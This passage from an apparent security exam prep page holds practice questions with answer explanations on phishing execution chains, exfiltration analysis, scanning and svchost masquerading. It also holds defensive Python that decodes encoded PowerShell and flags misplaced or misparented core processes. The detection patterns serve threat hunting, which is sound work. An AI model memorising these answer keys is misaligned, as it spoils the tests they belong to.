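ENC_ARG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Recover the script behind -EncodedCommand; None if the operand is not valid base64/UTF-16LE."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def word_children_with_sockets(conn):
    return conn.execute(WORD_CHILDREN_WITH_SOCKETS).fetchall()


def encoded_powershell_from_odd_parents(conn):
    rows = conn.execute(ENCODED_PS_ODD_PARENT).fetchall()
    return [(pid, parent, decode_encoded_command(cmd)) for pid, parent, cmd in rows]


if __name__ == "__main__":
    db = build_db()
    print("Word children with sockets:", word_children_with_sockets(db))
    print("Encoded PowerShell, odd parent:", encoded_powershell_from_odd_parents(db))
```

Both SQL strings run unchanged in osqueryi or a scheduled query pack, since osquery's SQL layer is SQLite. Note what each hunt deliberately excludes: the benign splwow64.exe child of Word has no socket and never appears, and the administrator's `-ExecutionPolicy Bypass -File` invocation is neither encoded nor parented by anything but explorer.exe.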
A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?
Phishing via malicious document leading to execution of a script.
Why this answer
Phishing often delivers malicious documents. Word spawning wscript.exe to download a PowerShell script is a classic phishing payload chain, mapped to sub-technique T1566.001 (Phishing: Spearphishing Attachment); the execution steps themselves would be tagged separately under T1204.002 (User Execution: Malicious File) and T1059 (Command and Scripting Interpreter).
A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?
Correct. Packet capture reveals the actual data being transmitted.
Why this answer
Full packet capture allows deep inspection of the sessions NetFlow can only summarize: the protocol in use, whether the payload is encrypted, and, for plaintext, what is being sent. Even for encrypted sessions it yields per-connection direction, volume and handshake details (certificate, SNI) that confirm or refute exfiltration, whereas NetFlow only provides metadata.
A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)
Disabling irrelevant plug-ins avoids false positives from unrelated checks.
Why this answer
Credentialed scans access system details for accurate results, and appropriate plug-in selection reduces irrelevant checks.
During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?
The attacker is running a malicious binary under the name of a legitimate system process from a user-writable path and has injected code into explorer.exe.
Why this answer
Running a binary named after a system process from a user-writable location is masquerading (ATT&CK T1036.005, Match Legitimate Name or Location); the real svchost.exe lives only in System32 and SysWOW64 and is always started by services.exe. Writing code into an already running explorer.exe is process injection (T1055). Process hollowing (T1055.012) is a specific variant in which the attacker starts a process suspended and replaces its image before it runs, so "injection" is the more accurate description of what is observed here.
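The check below is an added example (not from the original page) of turning that baseline into a hunt over a process listing: it compares each core Windows process name against its expected on-disk directory and expected parent, and reports both kinds of mismatch. The baseline table covers only the few processes whose location and parent are well established (as summarised in references such as the SANS "Know Normal, Find Evil" poster); the process list, PIDs and paths are constructed for the example.

```python
import ntpath
from typing import Dict, List

# Baseline for core Windows processes. Paths are compared case-insensitively.
EXPECTED_DIR: Dict[str, set] = {
    "svchost.exe":  {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe":    {r"c:\windows\system32"},
    "services.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}
EXPECTED_PARENT: Dict[str, set] = {
    "svchost.exe":  {"services.exe"},
    "lsass.exe":    {"wininit.exe"},
    "services.exe": {"wininit.exe"},
}


def check_process_list(procs: List[dict]) -> List[dict]:
    """Flag processes whose name matches a core Windows binary but whose on-disk location or
    parent does not match the baseline. Each proc is a dict with pid, ppid, name and path."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        name = p["name"].lower()
        if name not in EXPECTED_DIR and name not in EXPECTED_PARENT:
            continue                                   # not a process we have a baseline for
        directory = ntpath.dirname(p["path"]).lower()
        if name in EXPECTED_DIR and directory not in EXPECTED_DIR[name]:
            findings.append({"pid": p["pid"], "name": name,
                             "issue": "path_mismatch", "detail": p["path"]})
        parent = by_pid.get(p["ppid"])
        # services.exe and wininit.exe never exit, so a missing parent is itself a mismatch
        parent_name = parent["name"].lower() if parent else "<exited>"
        if name in EXPECTED_PARENT and parent_name not in EXPECTED_PARENT[name]:
            findings.append({"pid": p["pid"], "name": name,
                             "issue": "parent_mismatch", "detail": parent_name})
    return findings


# Constructed process listing: a normal boot chain plus one svchost.exe from C:\Users\Public.
SAMPLE_PROCS = [
    {"pid": 500,  "ppid": 400,  "name": "wininit.exe",  "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 600,  "ppid": 500,  "name": "services.exe", "path": r"C:\Windows\System32\services.exe"},
    {"pid": 650,  "ppid": 500,  "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe"},
    {"pid": 800,  "ppid": 600,  "name": "svchost.exe",  "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 820,  "ppid": 600,  "name": "svchost.exe",  "path": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 1000, "ppid": 900,  "name": "explorer.exe", "path": r"C:\Windows\explorer.exe"},
    {"pid": 4100, "ppid": 1000, "name": "svchost.exe",  "path": r"C:\Users\Public\svchost.exe"},
]

if __name__ == "__main__":
    for finding in check_process_list(SAMPLE_PROCS):
        print(finding)
```

The same two columns (image path and parent) are what memory-forensics process listings such as Volatility's pslist/pstree expose, so the check applies equally to a live osquery or EDR export and to a memory image.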
A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?
Agent-based scans run on endpoints and can perform authenticated checks with local privileges.
Why this answer
Credentialed (authenticated) network scans log in to the target with supplied credentials and enumerate installed software, patch levels and configuration that an unauthenticated probe cannot see; agent-based scans run locally on the endpoint with its own privileges and achieve the same depth without a network login. Either way the scanner can assess applications that require authentication.